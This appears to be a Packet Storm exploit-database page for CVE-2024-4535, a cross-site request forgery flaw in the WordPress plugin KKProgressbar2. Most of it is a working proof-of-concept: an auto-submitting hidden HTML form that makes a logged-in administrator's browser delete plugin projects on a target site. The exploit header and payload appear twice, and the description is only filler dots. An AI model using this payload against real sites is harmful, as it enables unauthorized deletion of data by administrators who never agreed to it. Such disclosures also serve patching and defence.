8.8
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Description
WordPress................................................
Basic Information
ID
PACKETSTORM:210192
Published
Oct 6, 2025 at 00:00
Affected Product
Affected Versions
# Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request
Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535
POC:
<body onload="document.forms[0].submit()">
<form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>
Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535
POC:
<body onload="document.forms[0].submit()">
<form action="http:// target.com/wp-admin/admin.php?page=kkpb-menu"
method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>